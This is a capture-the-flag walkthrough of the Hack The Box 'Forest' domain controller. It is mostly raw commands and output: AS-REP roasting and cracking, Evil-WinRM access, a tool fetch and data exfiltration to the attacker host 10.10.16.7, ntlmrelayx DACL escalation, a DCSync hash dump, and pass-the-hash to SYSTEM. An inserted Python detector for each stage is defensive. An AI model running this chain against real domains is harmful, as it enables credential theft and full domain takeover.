Forest
Fri, 27 September 2024
Platform: Hack The Box
sudo nmap 10.10.10.161 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-25 23:15 BST
Nmap scan report for 10.10.10.161
Host is up (0.074s latency).
Not shown: 65511 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-25 22:22:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49977/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 2h26m50s, deviation: 4h02m30s, median: 6m50s
| smb2-time:
| date: 2024-09-25T22:23:20
|_ start_date: 2024-09-25T00:20:45
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2024-09-25T15:23:18-07:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.05 seconds
sudo nano /etc/hosts
Domain name: htb.local
Forest name: htb.local
FQDN: FOREST.htb.local
enum4linux 10.10.10.161
Group: 'Domain Users' (RID: 513) has member: HTB\sebastien
Group: 'Domain Users' (RID: 513) has member: HTB\lucinda
Group: 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
Group: 'Domain Users' (RID: 513) has member: HTB\andy
Group: 'Domain Users' (RID: 513) has member: HTB\mark
Group: 'Domain Users' (RID: 513) has member: HTB\santi
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
Group: 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\DefaultAccount
Group: 'Domain Users' (RID: 513) has member: HTB\krbtgt
Group: 'Domain Users' (RID: 513) has member: HTB\$331000-VK4ADACQNUCA
Group: 'Domain Users' (RID: 513) has member: HTB\sebastien
Group: 'Domain Users' (RID: 513) has member: HTB\lucinda
Group: 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
Group: 'Domain Users' (RID: 513) has member: HTB\andy
Group: 'Domain Users' (RID: 513) has member: HTB\mark
Group: 'Domain Users' (RID: 513) has member: HTB\santi
Group: 'Organization Management' (RID: 1104) has member: HTB\Administrator
Group: 'Group Policy Creator Owners' (RID: 520) has member: HTB\Administrator
Group: 'Exchange Servers' (RID: 1118) has member: HTB\$D31000-NSEL5BRJ63V7
Group: 'Schema Admins' (RID: 518) has member: HTB\Administrator
Group: 'Domain Admins' (RID: 512) has member: HTB\Administrator
Group: 'Domain Guests' (RID: 514) has member: HTB\Guest
Group: 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group: 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
user:[svc-alfresco] rid:[0x47b]
Group: 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
impacket-GetNPUsers htb.local/svc-alfresco -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:d4a69f354ac6262fc100e3669429a950$c5732627693114d97f5993eb1a7b98c265c708aeefbd5abc11fd40ed335a735f59ca83af64e584cb9658aa9a2a2537eee8bd8f639f4cd20de81af6ec589932ea83d910134d61c2f8615e3823732e10336d1ba49a6afe3b4cf22976e6892fdb4c3c18e0d65999124693594de8969706ab381114dfa3f2fcf6aa0f09c6caf4eace098c90a6f30b1c3dc50ce0a35a8ffd5ea401e5fee46043bdc9653ad827ade94508b660de965449affe839b6d7acdf293150871c21de84f1efe7888c1f83d643fa7178e028f4cad6d25f9924c91aec227c673a0c5e0f38b7ff27eccb041cd588dabd538505bf2
echo '$krb5asrep$23$svc-alfresco@HTB.LOCAL:d4a69f354ac6262fc100e3669429a950$c5732627693114d97f5993eb1a7b98c265c708aeefbd5abc11fd40ed335a735f59ca83af64e584cb9658aa9a2a2537eee8bd8f639f4cd20de81af6ec589932ea83d910134d61c2f8615e3823732e10336d1ba49a6afe3b4cf22976e6892fdb4c3c18e0d65999124693594de8969706ab381114dfa3f2fcf6aa0f09c6caf4eace098c90a6f30b1c3dc50ce0a35a8ffd5ea401e5fee46043bdc9653ad827ade94508b660de965449affe839b6d7acdf293150871c21de84f1efe7888c1f83d643fa7178e028f4cad6d25f9924c91aec227c673a0c5e0f38b7ff27eccb041cd588dabd538505bf2' > hashes
john hashes -w=rockyou
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 512/512 AVX512BW 16x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1g 0:00:00:01 DONE (2024-09-26 01:08) 0.5025g/s 2054Kp/s 2054Kc/s 2054KC/s s515253..s262793
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
svc-alfresco:s3rvice
evil-winrm -i htb.local -u svc-alfresco -p 's3rvice'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-alfresco> dir
Directory: C:\Users\svc-alfresco
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/23/2019 2:16 PM Desktop
d-r--- 9/22/2019 4:02 PM Documents
d-r--- 7/16/2016 6:18 AM Downloads
d-r--- 7/16/2016 6:18 AM Favorites
d-r--- 7/16/2016 6:18 AM Links
d-r--- 7/16/2016 6:18 AM Music
d-r--- 7/16/2016 6:18 AM Pictures
d----- 7/16/2016 6:18 AM Saved Games
d-r--- 7/16/2016 6:18 AM Videos
*Evil-WinRM* PS C:\Users> gci -Recurse | % FullName
C:\Users\Administrator
C:\Users\Public
C:\Users\sebastien
C:\Users\svc-alfresco
Access to the path 'C:\Users\Administrator' is denied.
C:\Users\svc-alfresco\Desktop
C:\Users\svc-alfresco\Documents
C:\Users\svc-alfresco\Downloads
C:\Users\svc-alfresco\Favorites
C:\Users\svc-alfresco\Links
C:\Users\svc-alfresco\Music
C:\Users\svc-alfresco\Pictures
C:\Users\svc-alfresco\Saved Games
C:\Users\svc-alfresco\Videos
C:\Users\svc-alfresco\Desktop\user.txt
*Evil-WinRM* PS C:\Users> type C:\Users\svc-alfresco\Desktop\user.txt
83982e5bded81bde734c6f693ed23ad8
*Evil-WinRM* PS C:\Users> cd c:\programdata
*Evil-WinRM* PS C:\programdata> dir
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 11/20/2016 6:36 PM Microsoft
d----- 9/22/2019 4:56 PM Package Cache
d----- 9/18/2019 10:08 AM regid.1991-06.com.microsoft
d----- 7/16/2016 6:18 AM SoftwareDistribution
d----- 11/20/2016 6:19 PM USOPrivate
d----- 11/20/2016 6:19 PM USOShared
d----- 9/22/2019 4:56 PM VMware
*Evil-WinRM* PS C:\programdata> curl 10.10.16.7:8088/Windows/sharphound.exe -o ./sharphound.exe
*Evil-WinRM* PS C:\programdata> dir
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 11/20/2016 6:36 PM Microsoft
d----- 9/22/2019 4:56 PM Package Cache
d----- 9/18/2019 10:08 AM regid.1991-06.com.microsoft
d----- 7/16/2016 6:18 AM SoftwareDistribution
d----- 11/20/2016 6:19 PM USOPrivate
d----- 11/20/2016 6:19 PM USOShared
d----- 9/22/2019 4:56 PM VMware
-a---- 9/26/2024 7:33 PM 1046528 sharphound.exe
*Evil-WinRM* PS C:\programdata> .\sharphound.exe
2024-09-26T19:33:48.5189074-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-09-26T19:33:48.6439624-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-09-26T19:33:48.6754799-07:00|INFORMATION|Initializing SharpHound at 7:33 PM on 9/26/2024
2024-09-26T19:33:48.8470306-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for htb.local : FOREST.htb.local
2024-09-26T19:33:48.9720402-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-09-26T19:33:49.2845335-07:00|INFORMATION|Beginning LDAP search for htb.local
2024-09-26T19:33:49.3626631-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-09-26T19:33:49.3626631-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-09-26T19:34:20.2221028-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 38 MB RAM
2024-09-26T19:34:34.7533779-07:00|INFORMATION|Consumers finished, closing output channel
2024-09-26T19:34:34.7846264-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-09-26T19:34:34.9096250-07:00|INFORMATION|Status: 161 objects finished (+161 3.577778)/s -- Using 46 MB RAM
2024-09-26T19:34:34.9096250-07:00|INFORMATION|Enumeration finished in 00:00:45.6367282
2024-09-26T19:34:34.9877542-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings.
117 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-09-26T19:34:35.0033810-07:00|INFORMATION|SharpHound Enumeration Completed at 7:34 PM on 9/26/2024! Happy Graphing!
nc -lvp 4435 > bloodhound.zip
Listening on 0.0.0.0 4435
*Evil-WinRM* PS C:\programdata> dir
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 11/20/2016 6:36 PM Microsoft
d----- 9/22/2019 4:56 PM Package Cache
d----- 9/18/2019 10:08 AM regid.1991-06.com.microsoft
d----- 7/16/2016 6:18 AM SoftwareDistribution
d----- 11/20/2016 6:19 PM USOPrivate
d----- 11/20/2016 6:19 PM USOShared
d----- 9/22/2019 4:56 PM VMware
-a---- 9/26/2024 7:34 PM 18970 20240926193434_BloodHound.zip
-a---- 9/26/2024 7:38 PM 19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 9/26/2024 7:33 PM 1046528 sharphound.exe
*Evil-WinRM* PS C:\programdata> iwr http://10.10.16.7:4435 -Method POST -InFile ".\20240926193434_BloodHound.zip"
nc -lvp 4435 > bloodhound.zip
Listening on 0.0.0.0 4435
Connection received on htb.local 53355
ls bloodhound
20240926193434_computers.json
20240926193434_domains.json
20240926193434_groups.json
20240926193434_users.json
20240926193434_containers.json
20240926193434_gpos.json
20240926193434_ous.json
neo4j console
bloodhound
shortest path to 'htb.local'
exchange windows permissions 'WriteDacl'
The members of the group EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL have permissions to modify the DACL (Discretionary Access Control List) on the domain HTB.LOCAL
With write access to the target object's DACL, you can grant yourself any privilege you want on the object.
*Evil-WinRM* PS C:\programdata> net group "EXCHANGE WINDOWS PERMISSIONS" "svc-alfresco" /add
The command completed successfully.
impacket-ntlmrelayx -t ldap://htb.local --escalate-user svc-alfresco
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
[*] Open browser 127.0.0.1
[*] Login svc-alfresco:s3rvice
[*] HTTPD(80): Connection from 127.0.0.1 controlled, attacking target ldap://htb.local
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Authenticating against ldap://htb.local as /SVC-ALFRESCO SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User svc-alfresco now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20240927-041002.restore
[*] Dumping domain info for first time
[*] Domain info dumped into lootdir!
impacket-secretsdump svc-alfresco@htb.local
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
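Each stage of the chain above (the AS-REP roast of svc-alfresco, the self-added membership in Exchange Windows Permissions, the DACL write on the domain root through ntlmrelayx, and the DCSync with secretsdump) leaves a distinct Windows Security event on the domain controller. The following Python is an added example, not part of this write-up and not Impacket, BloodHound or SharpHound code: it replays constructed event records of those kinds and raises one alert per stage. The event IDs and the replication-right GUIDs are standard Windows and Active Directory values; the simplified field names, the sensitive-group list and the sample events are assumptions made for this example.

```python
"""
Added example (not from the Forest write-up, not Impacket/BloodHound code):
a small detector for the Windows Security events left by each stage of the
chain above. Assumption: events are pre-parsed into dicts carrying the
Event ID and the simplified field names used below; a real deployment would
feed them from a SIEM or Get-WinEvent XML. The sample events are constructed.
"""
from dataclasses import dataclass
from typing import Optional

# Extended-rights GUIDs a DCSync requires on the domain object (well-known AD values).
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# "Member added to security-enabled group" event IDs, by group scope.
GROUP_ADD_EVENTS = {4728: "global", 4732: "domain-local", 4756: "universal"}
# Groups whose membership changes always warrant an alert (site-specific assumption).
SENSITIVE_GROUPS = {"exchange windows permissions", "domain admins", "enterprise admins"}
# Root of the monitored domain (assumption matching this write-up's domain).
DOMAIN_ROOT_DN = "DC=htb,DC=local"


@dataclass
class Alert:
    stage: str
    subject: str
    detail: str


def check_asrep(ev: dict) -> Optional[Alert]:
    # 4768 = TGT requested. Pre-Authentication Type 0 with a success code means
    # the KDC returned an AS-REP without pre-authentication, which is what
    # GetNPUsers collected for svc-alfresco above.
    if ev["id"] == 4768 and ev.get("pre_auth_type") == 0 and ev.get("result") == "0x0":
        return Alert("asrep-roast", ev["target_user"],
                     f"TGT issued without pre-auth to {ev.get('client_ip', '?')}")
    return None


def check_group_add(ev: dict) -> Optional[Alert]:
    # 4728/4732/4756 = member added; the group's scope decides which ID the DC
    # logs, so all three are checked. A subject adding itself is the loudest case.
    scope = GROUP_ADD_EVENTS.get(ev["id"])
    if scope and ev.get("group", "").lower() in SENSITIVE_GROUPS:
        how = "self-added" if ev["subject"].lower() == ev["member"].lower() else "added"
        return Alert("sensitive-group-add", ev["subject"],
                     f"{ev['member']} {how} to {scope} group {ev['group']}")
    return None


def check_dacl_write(ev: dict) -> Optional[Alert]:
    # 5136 = directory object modified. nTSecurityDescriptor changing on the
    # domain root is the WriteDacl abuse ntlmrelayx performed above. Needs a
    # Directory Service Changes audit SACL on the domain object to be logged.
    if (ev["id"] == 5136 and ev.get("attribute", "").lower() == "ntsecuritydescriptor"
            and ev.get("object_dn", "").lower() == DOMAIN_ROOT_DN.lower()):
        return Alert("domain-dacl-write", ev["subject"],
                     f"DACL of {ev['object_dn']} modified ({ev.get('op', 'unknown op')})")
    return None


def check_dcsync(ev: dict) -> Optional[Alert]:
    # 4662 = operation on an AD object. Replication rights exercised by anything
    # other than a machine account ($) is the DCSync signature; legitimate sync
    # accounts (e.g. Azure AD Connect) would need an explicit allow-list.
    if ev["id"] != 4662 or ev["subject"].endswith("$"):
        return None
    used = [REPL_GUIDS[g] for g in ev.get("properties", []) if g in REPL_GUIDS]
    if used:
        return Alert("dcsync", ev["subject"], "replication rights used: " + ", ".join(used))
    return None


CHECKS = (check_asrep, check_group_add, check_dacl_write, check_dcsync)


def detect(events: list) -> list:
    """Run every check over every event; return alerts in event order."""
    alerts = []
    for ev in events:
        for check in CHECKS:
            alert = check(ev)
            if alert:
                alerts.append(alert)
    return alerts


# Constructed sample events mirroring the chain in this write-up (not real logs).
SAMPLE_EVENTS = [
    {"id": 4768, "target_user": "svc-alfresco", "pre_auth_type": 0, "result": "0x0", "client_ip": "10.10.16.7"},
    {"id": 4768, "target_user": "andy", "pre_auth_type": 2, "result": "0x0", "client_ip": "10.10.10.50"},
    {"id": 4756, "subject": "svc-alfresco", "group": "Exchange Windows Permissions", "member": "svc-alfresco"},
    {"id": 5136, "subject": "svc-alfresco", "object_dn": "DC=htb,DC=local",
     "attribute": "nTSecurityDescriptor", "op": "value added"},
    {"id": 4662, "subject": "svc-alfresco", "properties": ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"id": 4662, "subject": "FOREST$", "properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.stage}] {a.subject}: {a.detail}")
```

Run stand-alone it prints four alerts, one per stage, and stays silent for the ordinary TGT request and for the replication traffic from the FOREST$ machine account. The AS-REP check is the cheapest prevention point: clearing "Do not require Kerberos preauthentication" on service accounts removes the first stage entirely, and the 5136 check only fires if auditing of Directory Service Changes is enabled on the domain object.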
evil-winrm -i htb.local -u Administrator -H '32693b11e6aa90eb43d32c72a07ceea6'
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
996b8903c7c59a1529ad64883c86be04
impacket-psexec Administrator@htb.local cmd.exe -hashes 'aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file jybxPuJr.exe
[*] Opening SVCManager on htb.local.....
[*] Creating service zcOb on htb.local.....
[*] Starting service zcOb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
996b8903c7c59a1529ad64883c86be04